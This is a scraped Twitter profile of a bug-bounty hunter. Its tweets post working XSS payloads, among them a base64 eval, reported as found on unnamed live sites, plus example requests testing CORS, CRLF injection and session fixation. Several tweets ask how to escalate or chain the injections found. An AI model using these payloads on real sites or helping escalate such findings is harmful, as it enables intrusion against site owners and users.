Adem süslü (@suslu7616) 's Twitter Profile
Adem süslü

@suslu7616

Full Stack Developer

ID: 1265015423495548930

linkhttps://github.com/ademsuslu/ calendar_today25-05-2020 20:22:47

860 Tweet

89 Followers

296 Following

Adem süslü (@suslu7616) 's Twitter Profile Photo

I found #sqlinjection on site. How do you increase the impact or chain? #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips #sqlmap

I found #sqlinjection  on  site.  

How do you increase the impact or chain?

#bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips #sqlmap
Adem süslü (@suslu7616) 's Twitter Profile Photo

I found #xss on #ecommerce site. Payload; ">>>>><input autofocus onfocus="alert(5)"> How do you increase the impact? #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips

I found #xss on #ecommerce site. 
Payload; "&gt;&gt;&gt;&gt;&gt;&lt;input autofocus onfocus="alert(5)"&gt;  

How do you increase the impact?

#bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips
Adem süslü (@suslu7616) 's Twitter Profile Photo

I found #xss on site. Payload: <style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xss> #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #bugbountytips

I found #xss on  site.
Payload: &lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/xss&gt;
#bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec  #bugbountytips
Adem süslü (@suslu7616) 's Twitter Profile Photo

Forget everything, hacked & chill 😁😁 #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips

Adem süslü (@suslu7616) 's Twitter Profile Photo

#CORS Misconfiguration If we see evil.com is in the response Request: GET /about HTTP/2 Host: some.com Origin: evil.com Response: HTTP/2 200 Access-Control-Allow-Origin: evil.com Access-Control-Allow-Credentials: true

Adem süslü (@suslu7616) 's Twitter Profile Photo

I found #xss on site. Payload; "><?<a href="><svg/onload=alert(2)>"> Those who seek are not found, but those who find are the ones who seek. #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips

I found #xss on site. 
Payload;  "&gt;&lt;?&lt;a href="&gt;&lt;svg/onload=alert(2)&gt;"&gt;

Those who seek are not found, but those who find are the ones who seek.

#bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips
Adem süslü (@suslu7616) 's Twitter Profile Photo

I found #xss on site. Payload; " outofocus onfocus=alert(origin) x=" #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips

I found #xss on site.  
Payload;  " outofocus onfocus=alert(origin) x="  

#bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips
Adem süslü (@suslu7616) 's Twitter Profile Photo

I found #xss on someone site. Payload;"><?<a href="><svg/onload=alert(2)>"> #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips

I found #xss on someone site.
Payload;"&gt;&lt;?&lt;a href="&gt;&lt;svg/onload=alert(2)&gt;"&gt; 

#bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips
Adem süslü (@suslu7616) 's Twitter Profile Photo

I found #selfxss Payload:">>>>>><marquee>RXSS</marquee></head><abc></script><script>alert(origin)</script><meta What is possible with Self-XSS? #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips

I found #selfxss
Payload:"&gt;&gt;&gt;&gt;&gt;&gt;&lt;marquee&gt;RXSS&lt;/marquee&gt;&lt;/head&gt;&lt;abc&gt;&lt;/script&gt;&lt;script&gt;alert(origin)&lt;/script&gt;&lt;meta 

What is possible with Self-XSS? 

#bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips
Adem süslü (@suslu7616) 's Twitter Profile Photo

#CRLF Injection If we see X-Custom-Header: test is in the response hedef-site.com/%0d%0aX-Custom… Request: GET /%0d%0aX-Custom-Header%3Atest HTTP/2 Host: hedef-site.com Response: HTTP/2 200 OK Date: Tue, 10 Feb 2026 23:19:24 GMT Content-Type: text/html; charset=UTF-8 Vary:

Adem süslü (@suslu7616) 's Twitter Profile Photo

I found #selfxss Payload:">>>>>><marquee>RXSS</marquee></head><abc></script><script>alert(origin)</script><meta What is possible with Self-XSS? #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips

I found #selfxss
Payload:"&gt;&gt;&gt;&gt;&gt;&gt;&lt;marquee&gt;RXSS&lt;/marquee&gt;&lt;/head&gt;&lt;abc&gt;&lt;/script&gt;&lt;script&gt;alert(origin)&lt;/script&gt;&lt;meta  
What is possible with Self-XSS?
#bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips
Adem süslü (@suslu7616) 's Twitter Profile Photo

#CORS Misconfigration ı earn $$$ #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips #bugcrowd bugcrowd

#CORS Misconfigration
 
ı earn $$$

#bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips 
#bugcrowd <a href="/Bugcrowd/">bugcrowd</a>
Adem süslü (@suslu7616) 's Twitter Profile Photo

I found #xss on someone site. Payload; <?<a href="><body onload="eval(atob('YWxlcnQoJ1N1Y2Nlc3NmdWwgWFNTJyk='))">"> How do you increase the impact? #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips

I found #xss on someone site. 
Payload; &lt;?&lt;a href="&gt;&lt;body onload="eval(atob('YWxlcnQoJ1N1Y2Nlc3NmdWwgWFNTJyk='))"&gt;"&gt;

How do you increase the impact?  

#bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips
Adem süslü (@suslu7616) 's Twitter Profile Photo

Hello hackers, What vulnerabilities did you find last week? #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips

Adem süslü (@suslu7616) 's Twitter Profile Photo

In a WordPress installation, I found an unauthenticated blind SSRF in xmlrpc.php (exploitable through pingback.ping, possibly via DNS rebinding or TOCTOU race condition). What is the actual severity and practical impact of this issue? Can it lead to internal network

Adem süslü (@suslu7616) 's Twitter Profile Photo

Session fixation; If you modify the cookie value in the request we send and the response is reflected in the body, then there is a vulnerability. POST /endpoint HTTP/2 Host: web-site.com Cookie: PHPSESSID=TESTFIXATION123456; HTTP/2 200 OK X-Frame-Options:

Adem süslü (@suslu7616) 's Twitter Profile Photo

/\ / \ / \ / \ ___/ \__/ \________________ die. #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips

/\           / \
           /  \        /     \
   ___/      \__/         \________________ die.

#bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips